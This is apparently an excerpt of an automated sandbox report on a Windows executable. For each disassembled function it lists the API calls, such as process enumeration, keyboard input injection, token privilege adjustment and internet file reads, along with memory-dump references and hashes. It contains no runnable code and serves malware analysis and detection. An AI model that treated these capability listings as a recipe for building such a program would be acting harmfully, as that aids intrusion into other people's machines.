                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: Window$EnabledForegroundIconicVisibleZoomed
                        • String ID:
                        • API String ID: 292994002-0
                        • Opcode ID: d8f3e3bfb08eaad5f4364efcd678084393a3cdb9c1bd1a900befa3c77c839730
                        • Instruction ID: 4a080e7a5703d0020b35df091b147e6cf9d992db20207ec34b22771a6644831f
                        • Opcode Fuzzy Hash: d8f3e3bfb08eaad5f4364efcd678084393a3cdb9c1bd1a900befa3c77c839730
                        • Instruction Fuzzy Hash: 3521B5317802115FD7209F2AD884FAA7BE5EF85364F198058E946CB351DB71DC82CBD4
                        Function 00988060 Relevance: 7.4, Strings: 5, Instructions: 1151COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID:
                        • String ID: ERCP$VUUU$VUUU$VUUU$VUUU
                        • API String ID: 0-1546025612
                        • Opcode ID: 9fcb68debc02c3750969d49dbe6bcf00725382215995be933319fb75302f1ddf
                        • Instruction ID: ec271effbd8fc9756521eae906730df968b335cecc51bebfa5fd66338cfe5909
                        • Opcode Fuzzy Hash: 9fcb68debc02c3750969d49dbe6bcf00725382215995be933319fb75302f1ddf
                        • Instruction Fuzzy Hash: 38A2A371E0021ACBDF24DF58C840BAEB7B5BF54310F6585AAE815A7385EB34AD81CF61
                        Function 00A0A67C Relevance: 6.2, APIs: 4, Instructions: 175processCOMMON
                        Download Yara Rule
                        APIs
                        • CreateToolhelp32Snapshot.KERNEL32 ref: 00A0A6AC
                        • Process32FirstW.KERNEL32(00000000,?), ref: 00A0A6BA
                          • Part of subcall function 00989CB3: _wcslen.LIBCMT ref: 00989CBD
                        • Process32NextW.KERNEL32(00000000,?), ref: 00A0A79C
                        • CloseHandle.KERNEL32(00000000), ref: 00A0A7AB
                          • Part of subcall function 0099CE60: CompareStringW.KERNEL32(00000409,00000001,?,00000000,00000000,?,?,00000000,?,009C3303,?), ref: 0099CE8A
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: Process32$CloseCompareCreateFirstHandleNextSnapshotStringToolhelp32_wcslen
                        • String ID:
                        • API String ID: 1991900642-0
                        • Opcode ID: c31c03b0493825892a4b7fc8386c7d43c1ec01fb74d734b24e21e6855e917b5d
                        • Instruction ID: 105ae1c124fc02bee40b24b0f5f8bf66a4e22f425ccb2a0813d55f251f2ebc78
                        • Opcode Fuzzy Hash: c31c03b0493825892a4b7fc8386c7d43c1ec01fb74d734b24e21e6855e917b5d
                        • Instruction Fuzzy Hash: BF515BB1508301AFD710EF64D886A6BBBE8FFC9754F00892DF595972A1EB31D904CB92
                        Function 009EAA57 Relevance: 6.1, APIs: 4, Instructions: 107keyboardwindowCOMMON
                        Download Yara Rule
                        APIs
                        • GetKeyboardState.USER32(?,00000001,00000040,00000000), ref: 009EAAAC
                        • SetKeyboardState.USER32(00000080), ref: 009EAAC8
                        • PostMessageW.USER32(?,00000102,00000001,00000001), ref: 009EAB36
                        • SendInput.USER32(00000001,?,0000001C,00000001,00000040,00000000), ref: 009EAB88
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: KeyboardState$InputMessagePostSend
                        • String ID:
                        • API String ID: 432972143-0
                        • Opcode ID: 794ae3eb13ca35d738b85be6815f7fd1373785b6f314463831e38b654d42a972
                        • Instruction ID: 3159848e0f3555381d2002f5acb8c58092440e24524d749a3e9ed482b1cd2725
                        • Opcode Fuzzy Hash: 794ae3eb13ca35d738b85be6815f7fd1373785b6f314463831e38b654d42a972
                        • Instruction Fuzzy Hash: 98311C30A40288AEFB36CA66CC05BFA77ABAB54320F0C421AF191961F1D374AD85C752
                        Function 009BBB6F Relevance: 6.1, APIs: 4, Instructions: 90timeCOMMON
                        Download Yara Rule
                        APIs
                        • _free.LIBCMT ref: 009BBB7F
                          • Part of subcall function 009B29C8: RtlFreeHeap.NTDLL(00000000,00000000,?,009BD7D1,00000000,00000000,00000000,00000000,?,009BD7F8,00000000,00000007,00000000,?,009BDBF5,00000000), ref: 009B29DE
                          • Part of subcall function 009B29C8: GetLastError.KERNEL32(00000000,?,009BD7D1,00000000,00000000,00000000,00000000,?,009BD7F8,00000000,00000007,00000000,?,009BDBF5,00000000,00000000), ref: 009B29F0
                        • GetTimeZoneInformation.KERNEL32 ref: 009BBB91
                        • WideCharToMultiByte.KERNEL32(00000000,?,00A5121C,000000FF,?,0000003F,?,?), ref: 009BBC09
                        • WideCharToMultiByte.KERNEL32(00000000,?,00A51270,000000FF,?,0000003F,?,?,?,00A5121C,000000FF,?,0000003F,?,?), ref: 009BBC36
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: ByteCharMultiWide$ErrorFreeHeapInformationLastTimeZone_free
                        • String ID:
                        • API String ID: 806657224-0
                        • Opcode ID: 8495f372c67e9f5dea83a297b740f493b33f80b74480fe5d0a8431f895a339af
                        • Instruction ID: f44483acfd88a18a53161fc61b4d7de701cbc056d5b3f70e8f0314528ce42172
                        • Opcode Fuzzy Hash: 8495f372c67e9f5dea83a297b740f493b33f80b74480fe5d0a8431f895a339af
                        • Instruction Fuzzy Hash: BA31BC70944205EFCB10DFA8CD80ABDBBB8BF45720B1446AAE060DB2A1D7709E42CB50
                        Function 009FCE44 Relevance: 6.1, APIs: 4, Instructions: 75filenetworkCOMMON
                        Download Yara Rule
                        APIs
                        • InternetReadFile.WININET(?,?,00000400,?), ref: 009FCE89
                        • GetLastError.KERNEL32(?,00000000), ref: 009FCEEA
                        • SetEvent.KERNEL32(?,?,00000000), ref: 009FCEFE
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: ErrorEventFileInternetLastRead
                        • String ID:
                        • API String ID: 234945975-0
                        • Opcode ID: 2d87cdaf1f6248c8378273a8d2e5188a67ea2911288233d35b010a5149ea1a76
                        • Instruction ID: 3526e9861fbefeeba35125a51ab3b53032b7cd5c91dbf1e41cc6a6f9dda814b9
                        • Opcode Fuzzy Hash: 2d87cdaf1f6248c8378273a8d2e5188a67ea2911288233d35b010a5149ea1a76
                        • Instruction Fuzzy Hash: B921BDB154030DABDB20DFA5CA48BB6B7FCEF40354F10882EE646D2151E774EE058BA4
                        Function 009E8298 Relevance: 5.1, APIs: 1, Strings: 2, Instructions: 568stringCOMMON
                        Download Yara Rule
                        APIs
                        • lstrlenW.KERNEL32(?,?,?,00000000), ref: 009E82AA
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: lstrlen
                        • String ID: ($|
                        • API String ID: 1659193697-1631851259
                        • Opcode ID: 821eeb16da05a4165c9a6f05b7d9db5518e6ce69f9e10a32db010c486bdcd871
                        • Instruction ID: 9dbde40b4db1058d3f2fee50dfefa6ddf2869e2151b741b453d413b054d225ae
                        • Opcode Fuzzy Hash: 821eeb16da05a4165c9a6f05b7d9db5518e6ce69f9e10a32db010c486bdcd871
                        • Instruction Fuzzy Hash: 9B323575A007459FCB29CF5AC481A6AB7F0FF48710B15C56EE49ADB3A1EB70E941CB40
                        Function 009F5C97 Relevance: 4.6, APIs: 3, Instructions: 138fileCOMMON
                        Download Yara Rule
                        APIs
                        • FindFirstFileW.KERNEL32(?,?), ref: 009F5CC1
                        • FindNextFileW.KERNEL32(00000000,?), ref: 009F5D17
                        • FindClose.KERNEL32(?), ref: 009F5D5F
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: Find$File$CloseFirstNext
                        • String ID:
                        • API String ID: 3541575487-0
                        • Opcode ID: 9521d9616c166a0e9fdda0e8f8e47e4bdc355e8058834303602fca2021691da2
                        • Instruction ID: acf38d53bec854ab4c45fc72113d6c739368baea9b56a8d74d313158dd537868
                        • Opcode Fuzzy Hash: 9521d9616c166a0e9fdda0e8f8e47e4bdc355e8058834303602fca2021691da2
                        • Instruction Fuzzy Hash: 6951BC74604A059FC714DF28C494EA6B7E8FF4A324F15855DEAAA8B3A1DB30EC05CF91
                        Function 009B2622 Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        • IsDebuggerPresent.KERNEL32 ref: 009B271A
                        • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 009B2724
                        • UnhandledExceptionFilter.KERNEL32(?), ref: 009B2731
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: ExceptionFilterUnhandled$DebuggerPresent
                        • String ID:
                        • API String ID: 3906539128-0
                        • Opcode ID: 8ba52bad7979d20cdd48123285e0ef5abd01c7e2b8591b4f7a1236dec841f49f
                        • Instruction ID: 5faf50c0785520b9c8b9b3e75b4b5630e667aff777cb4117f097ba8d24b5ed5d
                        • Opcode Fuzzy Hash: 8ba52bad7979d20cdd48123285e0ef5abd01c7e2b8591b4f7a1236dec841f49f
                        • Instruction Fuzzy Hash: 5431D5749412189BCB21DF68DD897DCB7B8EF48320F5041EAE41CA7260EB309F818F84
                        Function 009F51CD Relevance: 4.6, APIs: 3, Instructions: 76COMMON
                        Download Yara Rule
                        APIs
                        • SetErrorMode.KERNEL32(00000001), ref: 009F51DA
                        • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 009F5238
                        • SetErrorMode.KERNEL32(00000000), ref: 009F52A1
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: ErrorMode$DiskFreeSpace
                        • String ID:
                        • API String ID: 1682464887-0
                        • Opcode ID: fadab8b5add0ef56bf10caf51c8e93142e030178088f77a8e8bdb0390aadccd3
                        • Instruction ID: 244b04cb8c2b204da4caa19df6a83178826bdb6b4cbd28b8094c0c9ee108be8f
                        • Opcode Fuzzy Hash: fadab8b5add0ef56bf10caf51c8e93142e030178088f77a8e8bdb0390aadccd3
                        • Instruction Fuzzy Hash: 63314D75A005189FDB00DF94D884FEDBBB4FF49318F098199E905AB362DB31E856CBA0
                        Function 009E16C3 Relevance: 4.6, APIs: 3, Instructions: 68COMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 0099FDDB: __CxxThrowException@8.LIBVCRUNTIME ref: 009A0668
                          • Part of subcall function 0099FDDB: __CxxThrowException@8.LIBVCRUNTIME ref: 009A0685
                        • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 009E170D
                        • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 009E173A
                        • GetLastError.KERNEL32 ref: 009E174A
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: Exception@8Throw$AdjustErrorLastLookupPrivilegePrivilegesTokenValue
                        • String ID:
                        • API String ID: 577356006-0
                        • Opcode ID: 351005b6a59695e1f48589a8ab0b3078a9b24f55558fb314c0b1117ef83a2d1f
                        • Instruction ID: 2196d0b25f00810fb556aa61d57c482535158e127476e6f2e252759a41cf4d5c
                        • Opcode Fuzzy Hash: 351005b6a59695e1f48589a8ab0b3078a9b24f55558fb314c0b1117ef83a2d1f
                        • Instruction Fuzzy Hash: EC1191B2414305AFD718DF54DC86EAAB7BDEB48B24B20852EE05697681EB71BC41CA24
                        Function 009ED5EB Relevance: 4.6, APIs: 3, Instructions: 58fileCOMMON
                        Download Yara Rule
                        APIs
                        • CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 009ED608
                        • DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,00000028,?,00000000), ref: 009ED645
                        • CloseHandle.KERNEL32(?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 009ED650
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: CloseControlCreateDeviceFileHandle
                        • String ID:
                        • API String ID: 33631002-0
                        • Opcode ID: 9dd52c28d43539317d0d67db154463842ef82b2699f05b262703f9f7be91c1a7
                        • Instruction ID: 711d4dab008f971491603637caba280dc1dc81a4a64debb3575c4d9a75ec14ec
                        • Opcode Fuzzy Hash: 9dd52c28d43539317d0d67db154463842ef82b2699f05b262703f9f7be91c1a7
                        • Instruction Fuzzy Hash: 27117C71E41228BBDB108F959C44FEFBBBCEB45B60F108111F914E7290C2704A018BA1
                        Function 009E1663 Relevance: 4.5, APIs: 3, Instructions: 40memoryCOMMON
                        Download Yara Rule
                        APIs
                        • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 009E168C
                        • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 009E16A1
                        • FreeSid.ADVAPI32(?), ref: 009E16B1
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: AllocateCheckFreeInitializeMembershipToken
                        • String ID:
                        • API String ID: 3429775523-0
                        • Opcode ID: ceb697ad8f6cd2f36e8fba144e0f0946a37d1f83d5646420da12dcd5b6ab3b82
                        • Instruction ID: b9cb9fc704ec4b73e5196bcc0de1719978f5a4cb3fc8a88f2e8976acfa3e21f1
                        • Opcode Fuzzy Hash: ceb697ad8f6cd2f36e8fba144e0f0946a37d1f83d5646420da12dcd5b6ab3b82
                        • Instruction Fuzzy Hash: BFF0F471990309FBDB00DFE49C89EAEBBBCEB08614F508565E501E2181E774AA448A50
                        Function 009A4CE8 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        • GetCurrentProcess.KERNEL32(009B28E9,?,009A4CBE,009B28E9,00A488B8,0000000C,009A4E15,009B28E9,00000002,00000000,?,009B28E9), ref: 009A4D09
                        • TerminateProcess.KERNEL32(00000000,?,009A4CBE,009B28E9,00A488B8,0000000C,009A4E15,009B28E9,00000002,00000000,?,009B28E9), ref: 009A4D10
                        • ExitProcess.KERNEL32 ref: 009A4D22
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: Process$CurrentExitTerminate
                        • String ID:
                        • API String ID: 1703294689-0
                        • Opcode ID: 1f05861985d25584e36922e6f6a0de5bb3a857fbc8f0378d8127062ecd23b030
                        • Instruction ID: 1c6597fcbca0c8a0b4d397faa68d16d0155fcf7fb9e2c3b17f7d1684effa6b1f
                        • Opcode Fuzzy Hash: 1f05861985d25584e36922e6f6a0de5bb3a857fbc8f0378d8127062ecd23b030
                        • Instruction Fuzzy Hash: EDE0B631040148BBCF11AF94DE0AA987B69EB827A5B108014FD198A162DB75EE42CA80
                        Function 009DD27A Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                        Download Yara Rule
                        APIs
                        • GetUserNameW.ADVAPI32(?,?), ref: 009DD28C
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: NameUser
                        • String ID: X64
                        • API String ID: 2645101109-893830106
                        • Opcode ID: f1200cf39c883e5e16e3d8b9eb388311842f0e9bb7ef247dfec48b24b02ea5f4
                        • Instruction ID: a3b068836e5c55bffcf7196f8fc2afe7dfa01b64c80b40e07a17dec0d5f719cb
                        • Opcode Fuzzy Hash: f1200cf39c883e5e16e3d8b9eb388311842f0e9bb7ef247dfec48b24b02ea5f4
                        • Instruction Fuzzy Hash: 85D0C9B484212DEACF94CB90DCC8DD9B37CBB04345F104552F146B2100D73495498F20
                        Function 009ACAA0 Relevance: 3.5, APIs: 2, Instructions: 464COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 2fbdbeface8d474e65e3d830227d731b015bc4fe83c76ff0107a9da6199ccf29
                        • Instruction ID: ce3983a45759edc961097712dcbdacefb6b9c5d1677c656779f90e10e5ebe629
                        • Opcode Fuzzy Hash: 2fbdbeface8d474e65e3d830227d731b015bc4fe83c76ff0107a9da6199ccf29
                        • Instruction Fuzzy Hash: E1020CB1E002199FDF14CFA9C8806ADBBF5EF89324F254569D819EB384D731AD418BD4
                        Function 009F68EE Relevance: 3.1, APIs: 2, Instructions: 57fileCOMMON
                        Download Yara Rule
                        APIs
                        • FindFirstFileW.KERNEL32(?,?), ref: 009F6918
                        • FindClose.KERNEL32(00000000), ref: 009F6961
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: Find$CloseFileFirst
                        • String ID:
                        • API String ID: 2295610775-0
                        • Opcode ID: e62d5922194a85b7eb1fccd739a27aefb73328b6fe9a64dafde5c6b5eca3fb93
                        • Instruction ID: 5520028c039d8a2bb69a03d856b07932bd5452db160db1e67547d9e929a03017
                        • Opcode Fuzzy Hash: e62d5922194a85b7eb1fccd739a27aefb73328b6fe9a64dafde5c6b5eca3fb93
                        • Instruction Fuzzy Hash: B711D0756042009FD710DF69D484A26BBE4FF84328F14C699F5698F3A2C770EC45CB90
                        Function 009F37B5 Relevance: 3.0, APIs: 2, Instructions: 33windowCOMMON
                        Download Yara Rule
                        APIs
                        • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,?,00A04891,?,?,00000035,?), ref: 009F37E4
                        • FormatMessageW.KERNEL32(00001000,00000000,?,00000000,?,00000FFF,00000000,?,?,?,00A04891,?,?,00000035,?), ref: 009F37F4
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
